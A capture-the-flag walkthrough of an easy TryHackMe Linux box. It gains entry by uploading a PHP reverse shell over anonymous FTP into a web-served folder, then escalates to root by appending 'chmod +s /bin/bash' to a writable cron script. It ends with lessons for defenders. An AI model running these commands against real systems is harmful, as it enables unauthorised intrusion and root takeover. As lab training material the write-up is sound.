Box Info
| Field | Details |
|---|---|
| Platform | TryHackMe |
| Difficulty | Easy |
| OS | Linux |
| Skills | FTP, File Upload RCE, Cron Privesc |
Phase 1: Reconnaissance
nmap -sV -sC -p- --min-rate 5000 10.10.X.X
# Results:
# PORT STATE SERVICE VERSION
# 21/tcp open ftp vsftpd 3.0.3
# 22/tcp open ssh OpenSSH 7.2p2
# 80/tcp open http Apache 2.4.18
Phase 2: FTP Anonymous Access
ftp 10.10.X.X
# Username: anonymous
# Password: (empty)
ftp> ls -la
# Found: notice.txt, important.jpg
ftp> get notice.txt
ftp> get important.jpg
Phase 3: Web Enumeration
gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt
# Found:
# /files (200) ← Shared with FTP!
Phase 4: RCE via PHP Shell Upload
# Upload PHP reverse shell via FTP
ftp 10.10.X.X
ftp> put shell.php
# Start listener
nc -lvnp 4444
# Trigger shell via browser:
# http://10.10.X.X/files/shell.php
We have a shell!
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Phase 5: Privilege Escalation
# Check cron jobs
cat /etc/crontab
# Found: writable script running as root
echo "chmod +s /bin/bash" >> /path/to/script.sh
# Wait for cron...
/bin/bash -p
# root#
Flags
user.txt: THM{XXXXXXXXXXXXXXXXXX}
root.txt: THM{XXXXXXXXXXXXXXXXXX}
Lessons Learned
- Anonymous FTP should always be disabled on production systems
- Sharing FTP directories with the web root is a critical RCE vulnerability
- Cron jobs running as root with writable scripts = trivial privilege escalation